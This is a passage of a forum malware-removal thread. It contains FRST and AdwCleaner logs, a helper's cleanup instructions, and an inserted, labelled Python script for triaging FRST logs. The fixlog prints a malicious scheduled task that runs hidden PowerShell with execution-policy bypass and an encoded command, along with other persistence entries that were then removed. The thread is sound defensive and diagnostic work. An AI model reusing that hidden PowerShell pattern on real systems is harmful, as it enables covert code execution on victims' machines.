C:\Users\RoNiN\AppData\Local\wdbext.dll
AppInit_DLLs: C:\ProgramData\AppxikenoZ\Volity.dll => No File
C:\ProgramData\AppxikenoZ
AppInit_DLLs-x32: C:\ProgramData\AppxikenoZ\Goldenphase.dll => No File
GroupPolicy: Restriction - Chrome <======= ATTENTION
GroupPolicyScripts-x32\User: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope {A2516833-3348-406A-96A6-26AAA93BF9DE} URL = 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {A2516833-3348-406A-96A6-26AAA93BF9DE} URL = 
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
S4 kBTNrls; "C:\ProgramData\QsKNKvQ\kBTNrls.exe" [X]
S4 Muibguaw; "C:\Users\RoNiN\AppData\Roaming\JiahiMhwodn\Tugboxh.exe" -cms [X]
S4 Nijgatfy; "C:\Users\RoNiN\AppData\Roaming\Kalekuhrin\Kalekuhrin.exe" -cms [X]
C:\ProgramData\QsKNKvQ
C:\Users\RoNiN\AppData\Roaming\JiahiMhwodn
C:\Users\RoNiN\AppData\Roaming\Kalekuhrin
2016-03-13 19:52 - 2016-03-13 19:52 - 00000000 ____D C:\WINDOWS\system32\nod
2016-03-13 19:48 - 2016-03-13 19:48 - 00000000 ____D C:\WINDOWS\system32\aro
2016-03-13 19:38 - 2016-03-13 19:38 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\c
2016-03-13 19:38 - 2016-03-13 19:38 - 00000000 ____D C:\ProgramData\1457912307
2016-03-13 19:24 - 2016-03-13 19:47 - 06000640 _____ C:\Program Files (x86)\GUTD8C6.tmp
2016-03-13 19:24 - 2016-03-13 19:24 - 00000000 ____D C:\Program Files (x86)\GUMD7DA.tmp
2016-03-13 18:44 - 2016-03-13 18:44 - 00000000 ____D C:\WINDOWS\system32\keja
2016-03-13 18:44 - 2016-03-13 18:44 - 00000000 ____D C:\WINDOWS\system32\byeq
2016-03-13 14:35 - 2016-03-25 14:59 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Vilvuk
2016-03-13 14:35 - 2016-03-22 23:42 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\MirhMevf
2016-03-11 19:32 - 2016-03-25 14:59 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Kalekuhrin
Task: {FAC6784A-CB17-4B4D-BDC7-4A4F34BACBE2} - System32\Tasks\{08080F47-0D0F-0F09-7D11-7A79790B110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAA (the data entry has 9540 more characters).
*****************
 
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\win_en_77 => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Rt562@ => value removed successfully
"C:\WINDOWS\Disable  task manager .bat" => not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT => value removed successfully
"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta" => not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Rty01 => value removed successfully
"C:\WINDOWS\call.vbs" => not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\TV => value removed successfully
"C:\WINDOWS\TV" => not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT78 => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT21 => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\Rt45 => value removed successfully
"C:\WINDOWS\auto explore.bat" => not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT55 => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT22 => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaTgg => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT5 => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT4 => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT1 => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\BSOD => value removed successfully
"C:\WINDOWS\bsod.hta" => not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\rst => value removed successfully
"C:\WINDOWS\rst.bat" => not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\DeleteOnReboot => value not found.
C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat => moved successfully
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Userinit => value restored successfully
HKU\S-1-5-21-470165136-1162808608-978993673-1001\Software\Microsoft\Windows\CurrentVersion\Run\\wdbext => value removed successfully
"C:\Users\RoNiN\AppData\Local\wdbext.dll" => not found.
"C:\ProgramData\AppxikenoZ\Volity.dll" => Value data removed successfully.
"C:\ProgramData\AppxikenoZ" => not found.
"C:\ProgramData\AppxikenoZ\Goldenphase.dll" => Value data removed successfully.
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => moved successfully
C:\WINDOWS\SysWOW64\GroupPolicy\User => moved successfully
"HKLM\SOFTWARE\Policies\Google" => key removed successfully
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A2516833-3348-406A-96A6-26AAA93BF9DE}" => key removed successfully
HKCR\CLSID\{A2516833-3348-406A-96A6-26AAA93BF9DE} => key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB}" => key removed successfully
HKCR\Wow6432Node\CLSID\{5C255C8A-E604-49b4-9D64-90988571CECB} => key not found. 
kBTNrls => service removed successfully
Muibguaw => service removed successfully
Nijgatfy => service removed successfully
"C:\ProgramData\QsKNKvQ" => not found.
"C:\Users\RoNiN\AppData\Roaming\JiahiMhwodn" => not found.
C:\Users\RoNiN\AppData\Roaming\Kalekuhrin => moved successfully
C:\WINDOWS\system32\nod => moved successfully
C:\WINDOWS\system32\aro => moved successfully
C:\Users\RoNiN\AppData\Roaming\c => moved successfully
C:\ProgramData\1457912307 => moved successfully
C:\Program Files (x86)\GUTD8C6.tmp => moved successfully
C:\Program Files (x86)\GUMD7DA.tmp => moved successfully
C:\WINDOWS\system32\keja => moved successfully
C:\WINDOWS\system32\byeq => moved successfully
C:\Users\RoNiN\AppData\Roaming\Vilvuk => moved successfully
C:\Users\RoNiN\AppData\Roaming\MirhMevf => moved successfully
"C:\Users\RoNiN\AppData\Roaming\Kalekuhrin" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FAC6784A-CB17-4B4D-BDC7-4A4F34BACBE2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FAC6784A-CB17-4B4D-BDC7-4A4F34BACBE2}" => key removed successfully
C:\WINDOWS\System32\Tasks\{08080F47-0D0F-0F09-7D11-7A79790B110F} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{08080F47-0D0F-0F09-7D11-7A79790B110F}" => key removed successfully
 
 
The system needed a reboot.
 
==== End of Fixlog 15:23:30 ====


#4 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,084 posts
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:04:37 PM

Posted 08 April 2016 - 02:56 PM

Hi Ronins8,
 
We will get to that in time, once the computer is clean :)
 
Please download AdwCleaner by Xplode and save to your Desktop.

  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator
  • The tool will start to update the database, please wait a bit.
  • Click on I agree button.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Report button...a logfile (AdwCleaner[R#].txt) will open in Notepad for review (where the largest value of # represents the most recent report).
  • The contents of the log file may be confusing. Unless you see a program name that you know should not be removed, don't worry about it. If you see an entry you want to keep, let me know about it.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of all logfiles are saved in the C:\AdwCleaner folder which was created when running the tool.

xXToffeeXx~




#5 Ronins8

Ronins8
  • Topic Starter

  • Members
  • 22 posts
  • Local time:04:37 PM

Posted 08 April 2016 - 10:36 PM

Hi Toffee!

Here is the log from adwcleaner.  Just to note I didn't hit the 'clean' button after the scan.

 

Thanks,

RoNiN


# AdwCleaner v5.109 - Logfile created 08/04/2016 at 23:29:09
# Updated 04/04/2016 by Xplode
# Database : 2016-04-07.1 [Server]
# Operating system : Windows 10 Home  (x64)
# Username : RoNiN - RONIN-LAPTOP
# Running from : C:\Users\RoNiN\Downloads\AdwCleaner.exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
 
***** [ Files ] *****
 
 
***** [ DLL ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{F56ACA29-1C99-40F1-AC64-2E44C4F6BC71}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{11D5E9EA-3117-4389-8E58-742F0975C980}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{12D3E096-0FDF-42CC-8F44-04944F9C1648}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{22389F39-2CF4-47C4-B8B2-273BB16BF70C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{23E3CEB3-D63A-433E-A5D0-4DB1C501B915}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{26A3152F-CF87-4C5B-8093-4D4B9EC084EB}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2723E96B-905F-4C64-8999-D868A08E6370}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{29E3319C-4B3C-479F-8692-BDD2CA30BEDD}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2FCB4E7E-E5C7-4D07-BB2C-78DF2DA867AD}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{367BD1CD-74A3-451F-B1A4-6A2DE4129A2D}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3D592FCB-FEFD-43A6-9A4F-BDE2D4607D07}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{49F018EE-F362-4B5B-8EC8-BCF9246ABF21}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{63B73044-FC1A-4FE1-991B-FDBD4CDAA868}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{67E5E37C-E6B8-4782-877D-E9437C4CD982}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{686D40BC-FA43-4317-8474-E634E6B487F2}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{7207E52B-821E-4C05-A8D6-2965B2BE77CF}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{863FCF5D-DC39-4DA9-AF32-CB0025990EEE}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{A310B105-FB7D-4497-A7E8-E046462B012F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{B09E015A-4D4E-4F8D-A436-95E19140947D}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{B1E712C4-03AA-495F-B0F5-0F057E126E2A}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D13DC65C-C77B-4986-9078-DEA3D34C71BB}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{DF522774-8CA0-4B15-A93A-5F61AB95DA1C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{F9A10D86-182A-4946-869B-70C3D109D14D}
Key Found : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\mpc.am
 
***** [ Web browsers ] *****
 
 
*************************
 
C:\AdwCleaner\AdwCleaner[C1].txt - [20165 bytes] - [07/04/2016 16:19:41]
C:\AdwCleaner\AdwCleaner[S1].txt - [20704 bytes] - [07/04/2016 16:15:59]
C:\AdwCleaner\AdwCleaner[S2].txt - [885 bytes] - [07/04/2016 16:30:45]
C:\AdwCleaner\AdwCleaner[S3].txt - [957 bytes] - [07/04/2016 16:46:57]
C:\AdwCleaner\AdwCleaner[S4].txt - [1029 bytes] - [07/04/2016 17:52:54]
C:\AdwCleaner\AdwCleaner[S5].txt - [1103 bytes] - [08/04/2016 13:20:32]
C:\AdwCleaner\AdwCleaner[S6].txt - [3087 bytes] - [08/04/2016 23:29:09]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S6].txt - [3160 bytes] ##########

Edited by Ronins8, 08 April 2016 - 10:37 PM.


#6 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,084 posts
  • Gender:Female
  • Location:The Arctic Circle

Posted 09 April 2016 - 02:46 PM

Hi Ronins8,
 
Double click on AdwCleaner.exe to run the tool again.

  • The tool will start to update the database, please wait a bit.
  • Click on the Scan button.
  • AdwCleaner will begin to scan your computer like it did before.
  • After the scan has finished, this time click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[S#].txt) will open automatically (where the largest value of # represents the most recent report).
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.

--------------

Please re-run FRST, put a check into the box next to Addition.txt and press the scan button. It will produce FRST.txt and Addition.txt logs located on the desktop. Please copy and paste the logs into your next reply.
 
xXToffeeXx~


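Post #6 asks for a fresh FRST log. As an added example (my code, not part of this thread, FRST or AdwCleaner), the Python script below runs the first-pass checks a helper applies when reading such a log: FRST's own ATTENTION markers, browser default-search entries whose host is not a known engine, Run entries that launch from user-writable paths, and binaries FRST reports as unsigned. The sample lines are copied from the FRST log posted later in this thread; the set of known search hosts and the heuristics themselves are my assumptions, not FRST's classification.

```python
"""First-pass triage of FRST (Farbar Recovery Scan Tool) log lines.

Added example for this thread, not code from FRST, AdwCleaner or the
posters. It flags the entries a malware-removal helper usually reads
first:
  * lines FRST itself marks with "<======= ATTENTION"
  * browser default-search entries whose host is not a known engine
  * Run entries that launch from a user profile or ProgramData
  * services or run entries FRST reports as "[File not signed]"
KNOWN_SEARCH_HOSTS and the heuristics are assumptions for this example,
not FRST's own classification.
"""
import re
from typing import List, Tuple

# Assumption: search engines the helper treats as benign defaults.
KNOWN_SEARCH_HOSTS = {
    "www.bing.com", "www.google.com", "search.yahoo.com", "duckduckgo.com",
}

# FRST defangs URLs as hxxp:// and hxxps://; capture the host part.
DEFANGED_URL = re.compile(r"(?i)hxxps?://([^/\s]+)")
# Paths a standard user can write to; adware and malware favour them.
USER_WRITABLE = re.compile(r"(?i)\b[a-z]:\\(users|programdata)\\")
# FRST's own marker for entries it wants the helper to look at.
ATTENTION = re.compile(r"<=+ ATTENTION")


def search_host(line: str) -> str:
    """Return the lowercase host of the first defanged URL on the line, or ''."""
    m = DEFANGED_URL.search(line)
    return m.group(1).lower() if m else ""


def triage_line(line: str) -> List[str]:
    """Return the list of tags that apply to one FRST log line."""
    tags: List[str] = []
    if ATTENTION.search(line):
        tags.append("frst-attention")
    if line.startswith(("CHR DefaultSearchURL", "SearchScopes")):
        host = search_host(line)
        if host and host not in KNOWN_SEARCH_HOSTS:
            tags.append("search-hijack:" + host)
    # Autostart entries live under ...\Run:; flag ones launched from
    # user-writable paths (per-user installers such as Google Update also
    # hit this rule, so treat it as "look closer", not "malicious").
    if "\\...\\Run:" in line and USER_WRITABLE.search(line):
        tags.append("run-from-user-writable")
    if "[File not signed]" in line:
        tags.append("unsigned-binary")
    return tags


def triage(log: str) -> List[Tuple[str, List[str]]]:
    """Return (line, tags) for every line in the log that earned a tag."""
    hits = []
    for raw in log.splitlines():
        line = raw.strip()
        tags = triage_line(line)
        if tags:
            hits.append((line, tags))
    return hits


# Sample input: lines copied from the FRST log posted in this thread.
SAMPLE_LOG = r"""
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM-x32\...\Run: [TkBellExe] => "C:\Users\RoNiN\update\realsched.exe"  -osboot
GroupPolicyScripts-x32\User: Restriction <======= ATTENTION
SearchScopes: HKLM -> OldSearch URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shdefault&prd=smw&pid=s&shr=d&q={searchTerms}&s=Unknown
R2 Fabs; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [1253376 2009-08-27] (MAGIX AG) [File not signed]
"""

if __name__ == "__main__":
    for line, tags in triage(SAMPLE_LOG):
        print(", ".join(tags).ljust(40), line)
```

Run it against a saved FRST.txt with `triage(open("FRST.txt", encoding="utf-8", errors="replace").read())`. The tags are a reading order, not a verdict: the Group Policy restriction and the Chrome default search pointing at www-searching.com are the lines that match the symptoms described in the first post, while a signed per-user updater that trips the Run rule is expected noise.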


#7 Ronins8

Ronins8
  • Topic Starter

  • Members
  • 22 posts

Posted 09 April 2016 - 03:41 PM

Thanks again Toffee! Here are the 3 logs:


# AdwCleaner v5.109 - Logfile created 09/04/2016 at 16:11:57
# Updated 04/04/2016 by Xplode
# Database : 2016-04-09.1 [Server]
# Operating system : Windows 10 Home  (x64)
# Username : RoNiN - RONIN-LAPTOP
# Running from : C:\Users\RoNiN\Downloads\AdwCleaner.exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
 
***** [ Files ] *****
 
 
***** [ DLL ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{F56ACA29-1C99-40F1-AC64-2E44C4F6BC71}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{11D5E9EA-3117-4389-8E58-742F0975C980}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{12D3E096-0FDF-42CC-8F44-04944F9C1648}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{22389F39-2CF4-47C4-B8B2-273BB16BF70C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{23E3CEB3-D63A-433E-A5D0-4DB1C501B915}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{26A3152F-CF87-4C5B-8093-4D4B9EC084EB}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2723E96B-905F-4C64-8999-D868A08E6370}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{29E3319C-4B3C-479F-8692-BDD2CA30BEDD}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2FCB4E7E-E5C7-4D07-BB2C-78DF2DA867AD}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{367BD1CD-74A3-451F-B1A4-6A2DE4129A2D}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3D592FCB-FEFD-43A6-9A4F-BDE2D4607D07}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{49F018EE-F362-4B5B-8EC8-BCF9246ABF21}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{63B73044-FC1A-4FE1-991B-FDBD4CDAA868}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{67E5E37C-E6B8-4782-877D-E9437C4CD982}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{686D40BC-FA43-4317-8474-E634E6B487F2}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{7207E52B-821E-4C05-A8D6-2965B2BE77CF}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{863FCF5D-DC39-4DA9-AF32-CB0025990EEE}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{A310B105-FB7D-4497-A7E8-E046462B012F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{B09E015A-4D4E-4F8D-A436-95E19140947D}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{B1E712C4-03AA-495F-B0F5-0F057E126E2A}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D13DC65C-C77B-4986-9078-DEA3D34C71BB}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{DF522774-8CA0-4B15-A93A-5F61AB95DA1C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{F9A10D86-182A-4946-869B-70C3D109D14D}
Key Found : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\mpc.am
 
***** [ Web browsers ] *****
 
 
*************************
 
C:\AdwCleaner\AdwCleaner[C1].txt - [20165 bytes] - [07/04/2016 16:19:41]
C:\AdwCleaner\AdwCleaner[S1].txt - [20704 bytes] - [07/04/2016 16:15:59]
C:\AdwCleaner\AdwCleaner[S2].txt - [885 bytes] - [07/04/2016 16:30:45]
C:\AdwCleaner\AdwCleaner[S3].txt - [957 bytes] - [07/04/2016 16:46:57]
C:\AdwCleaner\AdwCleaner[S4].txt - [1029 bytes] - [07/04/2016 17:52:54]
C:\AdwCleaner\AdwCleaner[S5].txt - [1103 bytes] - [08/04/2016 13:20:32]
C:\AdwCleaner\AdwCleaner[S6].txt - [3331 bytes] - [08/04/2016 23:29:09]
C:\AdwCleaner\AdwCleaner[S7].txt - [3160 bytes] - [09/04/2016 16:11:57]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S7].txt - [3233 bytes] ##########
 
 
FRST:::::
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by RoNiN (administrator) on RONIN-LAPTOP (09-04-2016 16:28:46)
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Emsisoft Ltd) C:\Program Files\Emsisoft Anti-Malware\a2service.exe
(MAGIX AG) C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MSIService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(Thrustmaster®) C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Google Inc.) C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\MusicManager.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10816544 2010-05-25] (Realtek Semiconductor)
HKLM\...\Run: [THXCfg64] => C:\windows\system32\RunDLL32.exe C:\windows\system32\THXCfg64.dll,RunDLLEntry THXCfg64
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [emsisoft anti-malware] => c:\program files\emsisoft anti-malware\a2guard.exe [9404304 2016-04-08] (Emsisoft Ltd)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-04-13] (Intel Corporation)
HKLM-x32\...\Run: [MGSysCtrl] => C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe [2486272 2010-06-04] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [THX Audio Control Panel] => C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe [1349632 2010-05-16] (Creative Technology Ltd)
HKLM-x32\...\Run: [CitrixReceiver] => "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
HKLM-x32\...\Run: [TkBellExe] => "C:\Users\RoNiN\update\realsched.exe"  -osboot
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [407904 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [153952 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595480 2016-03-20] (Oracle Corporation)
